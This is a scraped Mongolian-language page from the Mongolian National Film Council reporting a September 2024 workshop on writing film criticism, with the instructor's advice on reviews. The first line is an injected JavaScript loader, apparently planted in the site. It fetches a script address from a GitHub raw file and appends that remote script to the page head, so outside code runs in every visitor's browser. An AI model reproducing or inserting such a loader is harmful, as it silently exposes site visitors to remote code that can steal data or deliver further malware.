;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); “КИНО ШҮҮМЖ БИЧИХ АРГА ЗҮЙ” СУРГАЛТ АМЖИЛТАЙ БОЛЛОО - Mongolian National Film Council

“КИНО ШҮҮМЖ БИЧИХ АРГА ЗҮЙ” СУРГАЛТ АМЖИЛТАЙ БОЛЛОО

“КИНО ШҮҮМЖ БИЧИХ АРГА ЗҮЙ” СУРГАЛТ АМЖИЛТАЙ БОЛЛОО
“КИНО ШҮҮМЖ БИЧИХ АРГА ЗҮЙ” СУРГАЛТ АМЖИЛТАЙ БОЛЛОО
Соёл, спорт, аялал жуулчлал, залуучуудын яамны харьяа Кино урлагийн зөвлөлөөс “КИНО ШҮҮМЖ БИЧИХ АРГА ЗҮЙ” сургалтыг кино шүүмжлэгч Б.Амарсанаа багшийн удирдлага дор 2024 оны 09 дүгээр сарын 09-13-ны өдрүүдэд танхимаар Монголын Үндэсний Музей-д амжилтай зохион байгуулагдлаа. Энэхүү сургалтаар кино шүүмжлэлийн ач холбогдол, түүний Монгол болон гадаад орнууд дахь хөгжлийн ялгаатай байдал, шүүмжийн бүтэц, төрөл, шүүмж бичин нийтлүүлэх зэрэг 20 цагийн хөтөлбөр багтаасан сургалт явагдсан юм.
Сургалтын хөтөлбөр үйл явцаас дурдвал
– Кино шүүмж гэж юу вэ?
– Хэрхэн шүүмж бичих вэ?
– Кино үзэхээс эхлээд судалгаа хийж бичих үйл явц
– Кино шүүмжийн бүтэц, сонирхогчийн болон мэргэжлийн кино шүүмжийн ялгаа сэдэвт лекц
– Оролцогч тус бүртэй ганцаарчлан ажиллах, редакторлах
– Кино шүүмжлэлийн талаар санал солилцох
– ТЭНГИС КИНО ТЕАТР ба SAYAN PICTURES -ээс сургалтын оролцогчдодоо зориулж тусгай үзвэр гарган “Уналтын задлан” Уран сайхны кино үзэн кино шүүмжлэл бичиж, чөлөөт хэлэлцүүлэг явуулав.
Кино шүүмжлэгч, судлаач Б.Амарсанаа багшийн сургалтын явцад өөрийн туршлага кино шүүмж бичихдээ баримталдаг зарчмаа суралцагчдадаа хуваалцсаныг уншигчдадаа хуваалцахад:
Кино шүүмж бичих гэдэг нь киног муулах гэсэн үг биш. Тухайн киноны үйл явдлын эхлэлийг товчоор танилцуулж, киноны сэдэв, санаа, хийц зэргийг мэргэжлийн зүгээс харж, өөрт төрсөн сэтгэгдлийг бусадтай хуваалцан илэрхийлэх урлаг юм.
Та кино шүүмж бичихийг хүссэн ч хаанаас эхлэхээ мэдэхгүй байвал киногоо үзэж дуусаад юу ч бодохгүй шууд танд төрсөн сэтгэгдэл, бичихийг хүссэн зүйлээ үг үсгийн алдаа, хэв маяг зэргийг харгалзахгүй шууд буулгах хэрэгтэй. Дараа нь түүнийгээ уншиж зассанаар бүтэн шүүмжийг бичихэд дөхөм болно.
Кино шүүмж бичдэг тусгай дэг, зориулсан хэв маяг гэж байхгүй бөгөөд та тухайн бичвэрийг уран бүтээлчдэд эсвэл кино үзэгчдэд зориулсан уу гэдэг дээр өөрийн уншигчдыг тодорхойлж өөрийн сонгосон үгээр өөрийн бичвэрийн хэв маягаар л ялгагдаж байгаа гэв.
“Кино чухал учраас кино шүүмжлэл чухал” Roger Ebert гэдэг үгийг Багш сургалтын явцад эшлэсэн нь кино шүүмжлэгч нар манай Монгол Улсын кино урлагийн хөгжилд чухал хэрэгтэй гэдгийг тодотгож өгч байлаа.
Энэхүү сургалт нь Монголын кино урлагийн хүний нөөцийн чадавхыг ахиулсан үр өгөөжтэй сургалт болсонд Соёл, спорт, аялал жуулчлал, залуучуудын яамны харьяа Кино урлагийн зөвлөлийн гишүүд, ажлын алба баяртай байна.
Өнөөдөр батламжаа гардан авч оролцогч нар өөрсдийн төслийн дараах сэтгэдэллээ ярилцан багшдаа баярласанаа илэрхийлэн сургалтаа дүгнэн ярилцлаа.